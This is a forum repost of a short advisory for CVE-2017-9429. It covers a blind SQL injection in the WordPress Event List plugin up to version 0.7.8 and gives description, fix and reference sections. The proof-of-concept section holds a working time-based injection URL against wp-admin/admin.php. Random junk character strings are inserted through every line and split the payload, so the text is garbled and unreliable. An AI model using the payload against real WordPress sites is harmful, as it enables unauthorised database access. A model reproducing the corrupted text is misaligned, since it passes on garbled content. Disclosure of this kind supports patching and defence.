最近看过此主题的会员

返回列表 发帖
WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
1. Description:! f4 H' T# h( j1 q6 e# d6 p
  
4 {/ P! ]/ e/ ]' ^! Z     $ [. t9 z. j+ }4 I+ R  F' D
  
! I( s2 s+ X; V3 r& e* _) TSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress% r5 B) W" q  ]  r6 D+ j8 n
allows an authenticated user to execute arbitrary SQL commands via the id+ {; d/ V/ g! x" ~. L
parameter to wp-admin/admin.php.
# i" \: W" [; H- u+ D  
2 F5 t, g6 j: x& W' }9 o9 G, W' T   
$ W9 C; P& s9 D  
+ X1 ]+ f) `% b8 B& F; D: u2. Proof of Concept:
, T. H9 }6 u1 E  
  G3 M, m: d. j# O   
% i7 w" r3 Q: s7 k" S; U  
3 _: m+ u0 c9 }) ]2 Fhttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id, g2 W+ J6 r9 u. y
=1 AND SLEEP(10)
+ R& q( L8 `0 D" Y' z/ q& b& `( M- B$ f/ q+ n9 H" g
  . G+ j1 J$ r# U4 ?7 U, Y
   
' V. ~- G4 b+ c  H  
$ G9 [- x% N; m/ a5 E+ r6 t. n, M3. Solution:/ g9 h" H0 F# p; y2 X: w2 y$ P7 \
  
4 s$ t: R" R- J  r     
) b4 {( u7 r, Z1 K! V  
# {$ h& Y9 n$ v2 gThe plugin has been removed from WordPress. Deactivate the plug-in and wait, P+ j3 i+ J4 Y) D3 }% o: R; m
for a hotfix.: F, G4 ?; y& m  I: ~
  
, H3 G* `% w7 W$ }% j  J' H   5 J% t, U+ |: u! G5 q9 m
  6 W' H) P9 f% @/ |- [0 M7 S& P
4. Reference:9 F7 V2 x5 T/ W) }: p$ H( i
  3 \  S/ M# t; C8 A9 z
   & Q+ U: }' E6 y2 ?
  
  k9 Z, A) G, N) m# {! ihttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
( l( t( b8 `6 U+ Z( k( D, B% n, i) dction-sqli/
2 F* W* }) E! D* O# E; V  q6 Q  
! B0 b9 p8 h7 w* S- |http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
% Y8 a% ]- h7 x! g" u5 J8 [; K* S) `1 {' K8 ]) W1 X* T' f! ?
+ X9 y) D- v, w# x5 ^1 i0 H4 [  `
# m: R) d2 i# c" x1 Z! [

* ?, h7 G. u; j1 V" v( [# |+ O2 G" W! `5 O
1 t- z- l! d. C& p$ Z. H/ K0 O% Z; Y

2 R7 e- l+ }# J9 I$ \( C. @6 c0 P- Y  V3 F
4 B* G+ y5 {; t* h/ s) c! ^  Y% Q4 v
2 B6 D4 T* {9 `* F

/ e! J; M7 B7 U- n( [  q4 L. |) E% ?5 ?% @" v5 N
( Z! B( F! Y* O
# [; W  K( z! K! F( n  ^: s9 K
* t4 H; ?: A0 N7 E4 R- m. U) q: F
8 I( }  J) D: m5 ]2 H2 m, N
' B+ f& X5 m- g  j; |: I

3 O3 t$ t% X! E& i( q( B) L公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表